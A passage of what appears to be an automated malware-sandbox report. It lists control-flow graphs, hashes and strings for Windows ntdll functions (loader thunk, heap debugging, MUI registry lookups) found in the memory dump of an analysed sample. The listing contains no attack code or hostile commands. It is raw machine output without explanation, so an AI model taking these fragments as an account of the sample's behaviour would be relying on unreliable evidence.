8743->8749 8744 209c91fd RtlDebugPrintTimes 8744->8738 8745->8744 8746 209c934f RtlDebugPrintTimes 8746->8749 8747 209c9559 RtlDebugPrintTimes 8747->8749 8748 209c9871 RtlDebugPrintTimes 8748->8749 8749->8738 8749->8746 8749->8747 8749->8748 8750 209c96d0 RtlDebugPrintTimes 8749->8750 8751 209c9425 RtlDebugPrintTimes 8749->8751 8752 209c95dd RtlDebugPrintTimes 8749->8752 8750->8749 8751->8749 8752->8749 8753->8745 8581 2091d2ec 8584 2091d333 8581->8584 8586 2091d4c4 8581->8586 8582 2091d57b GetPEB 8583 2091d58d 8582->8583 8584->8583 8585 2091d4b0 GetPEB 8584->8585 8584->8586 8585->8586 8586->8582 8586->8583

                Executed Functions

                Function 209634E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 3 209634e0-209634ec LdrInitializeThunk
                APIs
                Memory Dump Source
                • Source File: 00000004.00000002.77599512264.00000000208F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 208F0000, based on PE: true
                • Associated: 00000004.00000002.77599512264.0000000020A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.77599512264.0000000020A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_208f0000_Sammentrykket.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: bdd4ef27ea98ca05895f92b7864e81221adb7cac9a3da09a8e4e505971b361ae
                • Instruction ID: ffd99f9d2fdcf6e69668d4e4eb88ee7665a6041fc8895052d5a1e9730a21a9c8
                • Opcode Fuzzy Hash: bdd4ef27ea98ca05895f92b7864e81221adb7cac9a3da09a8e4e505971b361ae
                • Instruction Fuzzy Hash: 8390027264520402D72062994654757102547D0201FA1C815A0624569DD7A5895175A3
                Function 20962B90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 0 20962b90-20962b9c LdrInitializeThunk
                APIs
                Memory Dump Source
                • Source File: 00000004.00000002.77599512264.00000000208F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 208F0000, based on PE: true
                • Associated: 00000004.00000002.77599512264.0000000020A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.77599512264.0000000020A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_208f0000_Sammentrykket.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: a6a72f8be1fd0d8f89be369b96b8538f1dc5810f8844f78ccf719a0b474a0e6b
                • Instruction ID: b28dbb0757fd69f48ce9c818dd2e0d2558e82c09277aa86f2b77325a4193c624
                • Opcode Fuzzy Hash: a6a72f8be1fd0d8f89be369b96b8538f1dc5810f8844f78ccf719a0b474a0e6b
                • Instruction Fuzzy Hash: 9990027224118802D7306299854479B002547D0301F95C815A4624659DD6A588917122
                Function 20962BC0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1 20962bc0-20962bcc LdrInitializeThunk
                APIs
                Memory Dump Source
                • Source File: 00000004.00000002.77599512264.00000000208F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 208F0000, based on PE: true
                • Associated: 00000004.00000002.77599512264.0000000020A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.77599512264.0000000020A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_208f0000_Sammentrykket.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: ac6cf05df8e66f36b74d58c4af927e18dbe606acfc2379c22410abde8716304c
                • Instruction ID: 20ad34b6ffac53c4ed8691dac6a8b92d324ef15db8800b1865c6c5d454183603
                • Opcode Fuzzy Hash: ac6cf05df8e66f36b74d58c4af927e18dbe606acfc2379c22410abde8716304c
                • Instruction Fuzzy Hash: 1290027224110402D72066D95548697002547E0301F91D415A5224556ED67588917132
                Function 20962D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 2 20962d10-20962d1c LdrInitializeThunk
                APIs
                Memory Dump Source
                • Source File: 00000004.00000002.77599512264.00000000208F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 208F0000, based on PE: true
                • Associated: 00000004.00000002.77599512264.0000000020A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.77599512264.0000000020A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_208f0000_Sammentrykket.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: c93d195562f519fb85bb46c7a4166730c70b90bdb69486d6da41118171fc698c
                • Instruction ID: 3d06ee00e40b507f3ce4f80b1a8f3529a3688c4d911fd9eb453a40d04a4036b0
                • Opcode Fuzzy Hash: c93d195562f519fb85bb46c7a4166730c70b90bdb69486d6da41118171fc698c
                • Instruction Fuzzy Hash: 1190027224110413D73162994644757002947D0241FD1C816A0624559DE6668952B122

                Non-executed Functions

                Function 209C9060 Relevance: 19.8, APIs: 8, Strings: 3, Instructions: 558timeCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 4 209c9060-209c90a9 5 209c90f8-209c9107 4->5 6 209c90ab-209c90b0 4->6 7 209c90b4-209c90ba 5->7 8 209c9109-209c910e 5->8 6->7 10 209c9215-209c923d call 20968f40 7->10 11 209c90c0-209c90e4 call 20968f40 7->11 9 209c9893-209c98a7 call 20964b50 8->9 20 209c925c-209c9292 10->20 21 209c923f-209c925a call 209c98aa 10->21 18 209c90e6-209c90f3 call 209e92ab 11->18 19 209c9113-209c91b4 GetPEB call 209cd7e5 11->19 32 209c91fd-209c9210 RtlDebugPrintTimes 18->32 30 209c91b6-209c91c4 19->30 31 209c91d2-209c91e7 19->31 24 209c9294-209c9296 20->24 21->24 24->9 28 209c929c-209c92b1 RtlDebugPrintTimes 24->28 28->9 38 209c92b7-209c92be 28->38 30->31 33 209c91c6-209c91cb 30->33 31->32 34 209c91e9-209c91ee 31->34 32->9 33->31 36 209c91f0 34->36 37 209c91f3-209c91f6 34->37 36->37 37->32 38->9 40 209c92c4-209c92df 38->40 41 209c92e3-209c92f4 call 209ca388 40->41 44 209c92fa-209c92fc 41->44 45 209c9891 41->45 44->9 46 209c9302-209c9309 44->46 45->9 47 209c947c-209c9482 46->47 48 209c930f-209c9314 46->48 49 209c961c-209c9622 47->49 50 209c9488-209c94b7 call 20968f40 47->50 51 209c933c 48->51 52 209c9316-209c931c 48->52 56 209c9674-209c9679 49->56 57 209c9624-209c962d 49->57 68 209c94b9-209c94c4 50->68 69 209c94f0-209c9505 50->69 54 209c9340-209c9391 call 20968f40 RtlDebugPrintTimes 51->54 52->51 53 209c931e-209c9332 52->53 58 209c9338-209c933a 53->58 59 209c9334-209c9336 53->59 54->9 93 209c9397-209c939b 54->93 63 209c967f-209c9687 56->63 64 209c9728-209c9731 56->64 57->41 62 209c9633-209c966f call 20968f40 57->62 58->54 59->54 89 209c9869 62->89 65 209c9689-209c968d 63->65 66 209c9693-209c96bd call 209c8093 63->66 64->41 70 209c9737-209c973a 64->70 65->64 65->66 90 209c9888-209c988c 66->90 91 209c96c3-209c971e call 20968f40 RtlDebugPrintTimes 66->91 73 209c94cf-209c94ee 68->73 74 209c94c6-209c94cd 68->74 78 209c9507-209c9509 69->78 79 209c9511-209c9518 69->79 75 209c97fd-209c9834 call 20968f40 70->75 76 209c9740-209c978a 70->76 88 209c9559-209c9576 RtlDebugPrintTimes 73->88 74->73 105 209c983b-209c9842 75->105 106 209c9836 75->106 86 209c978c 76->86 87 209c9791-209c979e 76->87 80 209c950f 78->80 81 209c950b-209c950d 78->81 83 209c953d-209c953f 79->83 80->79 81->79 94 209c951a-209c9524 83->94 95 209c9541-209c9557 83->95 86->87 96 209c97aa-209c97ad 87->96 97 209c97a0-209c97a3 87->97 88->9 111 209c957c-209c959f call 20968f40 88->111 98 209c986d 89->98 90->41 91->9 136 209c9724 91->136 107 209c939d-209c93a5 93->107 108 209c93eb-209c9400 93->108 102 209c952d 94->102 103 209c9526 94->103 95->88 100 209c97af-209c97b2 96->100 101 209c97b9-209c97fb 96->101 97->96 99 209c9871-209c9886 RtlDebugPrintTimes 98->99 99->9 99->90 100->101 101->99 114 209c952f-209c9531 102->114 103->95 112 209c9528-209c952b 103->112 115 209c984d 105->115 116 209c9844-209c984b 105->116 106->105 117 209c93a7-209c93d0 call 209c8093 107->117 118 209c93d2-209c93e9 107->118 110 209c9406-209c9414 108->110 119 209c9418-209c946f call 20968f40 RtlDebugPrintTimes 110->119 134 209c95bd-209c95d8 111->134 135 209c95a1-209c95bb 111->135 112->114 122 209c953b 114->122 123 209c9533-209c9535 114->123 124 209c9851-209c9857 115->124 116->124 117->119 118->110 119->9 140 209c9475-209c9477 119->140 122->83 123->122 129 209c9537-209c9539 123->129 130 209c985e-209c9864 124->130 131 209c9859-209c985c 124->131 129->83 130->98 137 209c9866 130->137 131->89 138 209c95dd-209c960b RtlDebugPrintTimes 134->138 135->138 136->64 137->89 138->9 142 209c9611-209c9617 138->142 140->90 142->70
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.77599512264.00000000208F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 208F0000, based on PE: true
                • Associated: 00000004.00000002.77599512264.0000000020A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.77599512264.0000000020A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_208f0000_Sammentrykket.jbxd
                Similarity
                • API ID: DebugPrintTimes
                • String ID: $ $0
                • API String ID: 3446177414-3352262554
                • Opcode ID: 874dfe2b314600de1fa804dd1f6cbb450a7f7f89caa78bb448c32c34c940e6ab
                • Instruction ID: a00ff4ead2ac9a50eeb3c0094b4987c8b870d691bab6416a88643acfc810f3e5
                • Opcode Fuzzy Hash: 874dfe2b314600de1fa804dd1f6cbb450a7f7f89caa78bb448c32c34c940e6ab
                • Instruction Fuzzy Hash: EC3215B1A083818FD350CFA8C888B5BBBE5BF88344F04496EF59A87251D779D949CB53
                Function 209CF0A5 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 231timeCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 343 209cf0a5-209cf0c7 call 20977be4 346 209cf0c9-209cf0de RtlDebugPrintTimes 343->346 347 209cf0e3-209cf0fb call 20917662 343->347 351 209cf3e7-209cf3f6 346->351 352 209cf101-209cf11c 347->352 353 209cf3d2 347->353 355 209cf11e 352->355 356 209cf125-209cf137 352->356 354 209cf3d5-209cf3e4 call 209cf3f9 353->354 354->351 355->356 358 209cf13c-209cf144 356->358 359 209cf139-209cf13b 356->359 361 209cf14a-209cf14d 358->361 362 209cf350-209cf359 GetPEB 358->362 359->358 361->362 363 209cf153-209cf156 361->363 364 209cf378-209cf37d call 2091b910 362->364 365 209cf35b-209cf376 GetPEB call 2091b910 362->365 367 209cf158-209cf170 call 2092fed0 363->367 368 209cf173-209cf196 call 209d0835 call 20935d90 call 209d0d24 363->368 370 209cf382-209cf396 call 2091b910 364->370 365->370 367->368 368->354 382 209cf19c-209cf1a3 368->382 370->353 383 209cf1ae-209cf1b6 382->383 384 209cf1a5-209cf1ac 382->384 385 209cf1b8-209cf1c8 383->385 386 209cf1d4-209cf1d8 383->386 384->383 385->386 389 209cf1ca-209cf1cf call 209dd646 385->389 387 209cf208-209cf20e 386->387 388 209cf1da-209cf1ed call 20953ae9 386->388 392 209cf211-209cf21b 387->392 396 209cf1ff 388->396 397 209cf1ef-209cf1fd call 2094fdb9 388->397 389->386 394 209cf21d-209cf22d 392->394 395 209cf22f-209cf236 392->395 394->395 398 209cf238-209cf23c call 209d0835 395->398 399 209cf241-209cf250 GetPEB 395->399 403 209cf202-209cf206 396->403 397->403 398->399 400 209cf2be-209cf2c9 399->400 401 209cf252-209cf255 399->401 400->354 408 209cf2cf-209cf2d5 400->408 405 209cf274-209cf279 call 2091b910 401->405 406 209cf257-209cf272 GetPEB call 2091b910 401->406 403->392 413 209cf27e-209cf292 call 2091b910 405->413 406->413 408->354 411 209cf2db-209cf2e2 408->411 411->354 414 209cf2e8-209cf2f3 411->414 422 209cf295-209cf29f GetPEB 413->422 414->354 415 209cf2f9-209cf302 GetPEB 414->415 417 209cf304-209cf31f GetPEB call 2091b910 415->417 418 209cf321-209cf326 call 2091b910 415->418 424 209cf32b-209cf34b call 209c823a call 2091b910 417->424 418->424 422->354 425 209cf2a5-209cf2b9 422->425 424->422 425->354
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.77599512264.00000000208F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 208F0000, based on PE: true
                • Associated: 00000004.00000002.77599512264.0000000020A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.77599512264.0000000020A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_208f0000_Sammentrykket.jbxd
                Similarity
                • API ID: DebugPrintTimes
                • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                • API String ID: 3446177414-1745908468
                • Opcode ID: 35b1821ba614015600b057f31400cfa0135a296e50712b355e1367c20d4c3f84
                • Instruction ID: 036c99bf428bc835990606765e7cb6a0fc7861522676316098ebd5d7574f8346
                • Opcode Fuzzy Hash: 35b1821ba614015600b057f31400cfa0135a296e50712b355e1367c20d4c3f84
                • Instruction Fuzzy Hash: A291FC31A04689EFDB02CFE8C4A0B9DFBF2FF59354F148089E5529B292C7399941DB11
                Function 2091D2EC Relevance: 11.6, Strings: 9, Instructions: 312COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 430 2091d2ec-2091d32d 431 2091d333-2091d335 430->431 432 2097a69c 430->432 431->432 433 2091d33b-2091d33e 431->433 435 2097a6a6-2097a6bf call 209dbd08 432->435 433->432 434 2091d344-2091d34c 433->434 436 2091d356-2091d3a1 call 20965050 call 20962ab0 434->436 437 2091d34e-2091d350 434->437 442 2097a6c5-2097a6c8 435->442 443 2091d56a-2091d56d 435->443 455 2091d3a7-2091d3b0 436->455 456 2097a600-2097a61a call 20917220 436->456 437->436 439 2097a5f6-2097a5fb 437->439 445 2091d5c0-2091d5c8 439->445 447 2091d54d-2091d54f 442->447 446 2091d56f-2091d575 443->446 450 2091d63b-2091d63d 446->450 451 2091d57b-2091d588 GetPEB call 20933bc0 446->451 447->443 449 2091d551-2091d564 call 20943262 447->449 449->443 465 2097a6cd-2097a6d2 449->465 457 2091d58d-2091d592 450->457 451->457 462 2091d3b2-2091d3b4 455->462 463 2091d3ba-2091d3cd call 2091d736 455->463 473 2097a624-2097a628 456->473 474 2097a61c-2097a61e 456->474 460 2091d5a1-2091d5a6 457->460 461 2091d594-2091d59d call 20962a80 457->461 468 2091d5b5-2091d5ba 460->468 469 2091d5a8-2091d5b1 call 20962a80 460->469 461->460 462->463 467 2097a630-2097a63b call 209dad61 462->467 479 2091d3d3-2091d3d7 463->479 480 2097a658 463->480 465->443 467->463 486 2097a641-2097a653 467->486 468->445 475 2097a6d7-2097a6db call 20962a80 468->475 469->468 473->467 474->473 481 2091d52e 474->481 487 2097a6e0 475->487 484 2091d5cb-2091d623 call 20965050 call 20962ab0 479->484 485 2091d3dd-2091d3f7 call 2091d8d0 479->485 491 2097a660-2097a662 480->491 488 2091d530-2091d535 481->488 504 2091d642-2091d645 484->504 505 2091d625 484->505 485->491 498 2091d3fd-2091d44e call 20965050 call 20962ab0 485->498 486->463 487->487 492 2091d537-2091d539 488->492 493 2091d549 488->493 491->443 497 2097a668 491->497 492->435 494 2091d53f-2091d543 492->494 493->447 494->435 494->493 502 2097a66d 497->502 498->480 510 2091d454-2091d45d 498->510 506 2097a677-2097a67c 502->506 504->481 509 2091d62f-2091d636 505->509 506->450 509->488 510->502 511 2091d463-2091d492 call 20965050 call 2091d64a 510->511 511->509 516 2091d498-2091d49e 511->516 516->509 517 2091d4a4-2091d4aa 516->517 517->450 518 2091d4b0-2091d4cc GetPEB call 20935d90 517->518 518->506 521 2091d4d2-2091d4ef call 2091d64a 518->521 524 2091d4f1-2091d4f6 521->524 525 2091d526-2091d52c 521->525 526 2097a681-2097a686 524->526 527 2091d4fc-2091d524 call 20944ca6 524->527 525->446 525->481 526->527 528 2097a68c-2097a697 526->528 527->525 528->488
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.77599512264.00000000208F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 208F0000, based on PE: true
                • Associated: 00000004.00000002.77599512264.0000000020A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.77599512264.0000000020A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_208f0000_Sammentrykket.jbxd
                Similarity
                • API ID:
                • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                • API String ID: 0-3532704233
                • Opcode ID: 7566fcb8922f9b4796cb63b5fcd9dfa805d16db6f9ba72a22f1dee4db6760061
                • Instruction ID: 2dc2da3dcc29dc7df3baca44a6a16416278a3c8b39b43f7aec5695d04924d2cf
                • Opcode Fuzzy Hash: 7566fcb8922f9b4796cb63b5fcd9dfa805d16db6f9ba72a22f1dee4db6760061
                • Instruction Fuzzy Hash: 36B1AEB260A3599FC711CFA8C880B4FB7E9AF84744F00496EF99AD7250D774DD848B92
                Function 2091D02D Relevance: 10.2, Strings: 8, Instructions: 249COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 583 2091d02d-2091d056 584 2097a5a1 583->584 585 2091d05c-2091d05f 583->585 587 2097a5ab-2097a5b4 call 20962a80 584->587 585->584 586 2091d065-2091d0b5 call 20965050 call 20962ab0 585->586 595 2097a514-2097a52e call 209dadd6 586->595 596 2091d0bb-2091d0cc call 2091d736 586->596 594 2097a5b9-2097a5bb 587->594 597 2097a5c1-2097a5c7 594->597 598 2091d1de-2091d1e6 594->598 604 2097a534-2097a537 595->604 605 2091d194-2091d199 595->605 606 2091d0d2-2091d0d5 596->606 607 2097a56f 596->607 597->598 601 2097a5cd-2097a5d0 597->601 608 2097a5d2-2097a5e4 GetPEB call 20933bc0 601->608 609 2097a5ef-2097a5f1 601->609 610 2097a559-2097a569 call 20962a80 604->610 611 2097a539-2097a54d call 209dad61 604->611 615 2091d1a4-2091d1a9 605->615 616 2091d19b-2091d19f call 20962a80 605->616 612 2091d1e9-2091d1ec 606->612 613 2091d0db-2091d0e0 606->613 625 2097a579-2097a593 call 209dadd6 607->625 608->609 609->598 610->607 611->610 636 2097a54f-2097a554 611->636 623 2091d1f2-2091d1fc 612->623 624 2091d2c9-2091d2d9 call 2091d9a2 612->624 619 2091d192 613->619 620 2091d0e6-2091d130 call 20965050 call 20962ab0 613->620 615->587 621 2091d1af-2091d1b4 615->621 616->615 619->605 620->625 655 2091d136-2091d184 call 20965050 call 20962ab0 620->655 629 2091d1b6-2091d1ba call 20962a80 621->629 630 2091d1bf-2091d1c1 621->630 633 2091d202-2091d25a call 20965050 call 20962ab0 623->633 634 2091d2de-2091d2e0 623->634 624->605 625->605 649 2097a599-2097a59b 625->649 629->630 630->594 639 2091d1c7-2091d1ca 630->639 641 2091d25f-2091d261 633->641 634->641 636->610 645 2097a556-2097a558 636->645 639->598 647 2091d1cc-2091d1d8 call 2091daa8 639->647 641->624 644 2091d263-2091d2c7 call 20965050 call 20962ab0 641->644 644->624 662 2091d2e5 644->662 645->610 647->598 659 2097a5e6-2097a5ea 647->659 649->584 655->624 665 2091d18a-2091d190 655->665 659->609 662->595 665->605 665->619
                Strings
                • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 2091D06F
                • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 2091D263
                • @, xrefs: 2091D09D
                • @, xrefs: 2091D2B3
                • @, xrefs: 2091D24F
                • Control Panel\Desktop\LanguageConfiguration, xrefs: 2091D136
                • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 2091D0E6
                • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 2091D202
                Memory Dump Source
                • Source File: 00000004.00000002.77599512264.00000000208F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 208F0000, based on PE: true
                • Associated: 00000004.00000002.77599512264.0000000020A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.77599512264.0000000020A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_208f0000_Sammentrykket.jbxd
                Similarity
                • API ID:
                • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                • API String ID: 0-1356375266
                • Opcode ID: a29df809ed02c2a8842a49cba6353f115c41e554fde569ab6efd0f6e0a375ea0
                • Instruction ID: 8315db8513661c88bc9cd8a129c9cacda0be988c8b60ac880df0a3711071bc69
                • Opcode Fuzzy Hash: a29df809ed02c2a8842a49cba6353f115c41e554fde569ab6efd0f6e0a375ea0
                • Instruction Fuzzy Hash: 68A16DB25093499FD321CFA4C981B5FF7E8BB84715F00492EF69A96240D778DA48CB93
                Function 2091F113 Relevance: 8.2, Strings: 6, Instructions: 684COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.77599512264.00000000208F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 208F0000, based on PE: true
                • Associated: 00000004.00000002.77599512264.0000000020A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.77599512264.0000000020A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_208f0000_Sammentrykket.jbxd
                Similarity
                • API ID:
                • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                • API String ID: 0-523794902
                • Opcode ID: 96c790c4bdcfe98d13dc7261d5a30e997c7ecf8aad0b7e919a1dcc12db030613
                • Instruction ID: 1afc7c62fda11c30f0cc5b4f0d6f755f562b93c3f3204cdf1d1240db5329fa49
                • Opcode Fuzzy Hash: 96c790c4bdcfe98d13dc7261d5a30e997c7ecf8aad0b7e919a1dcc12db030613
                • Instruction Fuzzy Hash: FA42DF723096499FC305CFA8C4A4B5AF7F9FF88204F1489A9F5978B2A1D738D981CB51
                Function 2093B0D0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 920 2093b0d0-2093b0ef call 2093c4a0 923 209881db 920->923 924 2093b0f5-2093b109 920->924 927 209881e4-209881e9 923->927 925 2093b1d5-2093b1dc 924->925 926 2093b10f-2093b154 GetPEB call 2093df36 call 2094015c 924->926 929 2093b303-2093b30a 925->929 930 2093b1e2-2093b1ef 925->930 964 2093b160 926->964 965 2093b156-2093b15a 926->965 933 2093b165-2093b173 call 2093df36 927->933 931 209881f8-209881ff 929->931 932 2093b310-2093b31d 929->932 935 2093b1f1-2093b1f7 930->935 936 2093b210-2093b21b 930->936 942 20988201 931->942 943 20988206-20988227 call 2099e692 931->943 937 2093b323-2093b328 932->937 938 2093b3fc-2093b401 932->938 955 2093b342-2093b347 933->955 956 2093b179-2093b17c 933->956 945 2093b3a7-2093b3b1 call 2095432e 935->945 946 2093b1fd-2093b200 935->946 939 2093b262 936->939 940 2093b21d-2093b22d 936->940 949 2093b264-2093b266 937->949 938->937 939->949 950 2093b233-2093b25b call 209688c0 940->950 951 2098823f-20988245 940->951 942->943 974 2098822f-2098823a call 2093c7e7 943->974 973 2093b3b7-2093b3c9 call 209423c4 945->973 945->974 946->945 948 2093b206-2093b20b 946->948 948->935 957 2093b20d 948->957 962 209882d2-209882d9 949->962 963 2093b26c-2093b272 949->963 982 2093b25f 950->982 958 20988251-2098825d 951->958 959 20988247 951->959 968 209881ee 955->968 969 2093b34d-2093b385 call 209301c0 call 20965050 call 2093c7e7 * 3 955->969 967 2093b17e-2093b180 956->967 957->936 971 2098825f 958->971 972 20988264-2098826c 958->972 959->958 975 209882fb-20988302 962->975 976 209882db-209882f8 call 2099e692 962->976 977 2093b2f5-2093b2fe call 2092fcf0 963->977 978 2093b278-2093b285 963->978 964->933 965->964 979 2093b32d-2093b332 965->979 967->962 989 2093b186-2093b188 967->989 968->931 969->956 1048 2093b38b-2093b393 969->1048 971->972 991 20988279-20988286 call 20935d60 972->991 992 2098826e-20988277 call 209a3c57 972->992 973->962 1015 2093b3cf-2093b3d5 973->1015 974->982 986 20988308-20988309 975->986 987 2093b2d8-2093b2dc 975->987 976->975 977->978 984 2093b2a0-2093b2ae call 2093c7e7 978->984 985 2093b287-2093b28d 978->985 979->927 980 2093b338-2093b33d 979->980 980->933 982->939 1021 2093b2d0-2093b2d2 984->1021 996 2093b2b0-2093b2bd 985->996 997 2093b28f-2093b292 985->997 986->987 1002 2093b2ea-2093b2f2 987->1002 1003 2093b2de-2093b2e5 call 2093c4a0 987->1003 1000 2093b1c7-2093b1c9 989->1000 1001 2093b18a-2093b191 989->1001 1025 20988288-2098828e 991->1025 1026 209882b0 991->1026 1024 209882a0-209882a2 992->1024 1011 2093b2ca-2093b2cc 996->1011 1012 2093b2bf 996->1012 997->984 1009 2093b294-2093b297 997->1009 1000->962 1016 2093b1cf-2093b1d2 1000->1016 1001->1000 1013 2093b193-2093b1b2 call 20939870 1001->1013 1003->1002 1009->984 1020 2093b299-2093b29e 1009->1020 1011->1021 1022 2093b2c0-2093b2c4 1012->1022 1035 2093b3da-2093b3f0 call 209423c4 call 2094e3c9 1013->1035 1036 2093b1b8-2093b1be 1013->1036 1015->949 1016->925 1020->984 1020->985 1021->962 1021->987 1022->1011 1030 209882ba-209882c7 1022->1030 1024->1026 1028 209882a4-209882a7 1024->1028 1025->1024 1027 20988290-2098829d call 209688c0 1025->1027 1026->1030 1027->1024 1028->1026 1030->1022 1033 209882cd 1030->1033 1033->1011 1039 2093b3f5 1035->1039 1036->1039 1040 2093b1c4 1036->1040 1039->938 1040->1000 1049 2093b395-2093b39c 1048->1049 1050 2093b39e 1048->1050 1049->1050 1051 2093b406-2093b408 1049->1051 1052 2093b3a0-2093b3a2 1050->1052 1051->1052 1052->967
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.77599512264.00000000208F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 208F0000, based on PE: true
                • Associated: 00000004.00000002.77599512264.0000000020A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.77599512264.0000000020A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_208f0000_Sammentrykket.jbxd
                Similarity
                • API ID:
                • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                • API String ID: 0-122214566
                • Opcode ID: a119564e33fb6c981162ff674229dd712f9c6bb00a666b8315ee0287669bef74
                • Instruction ID: e38ffa2285e53d2fa359fc861c7ca3fe6da57faaff5ba4e9680b3a7f77a79bbe
                • Opcode Fuzzy Hash: a119564e33fb6c981162ff674229dd712f9c6bb00a666b8315ee0287669bef74
                • Instruction Fuzzy Hash: 5CC15771A042199BCB14EBE4C891BBFB7B4AF55340F1442A9EA239B391D778CD44CBA1
                Function 2094510F Relevance: 6.7, Strings: 5, Instructions: 434COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
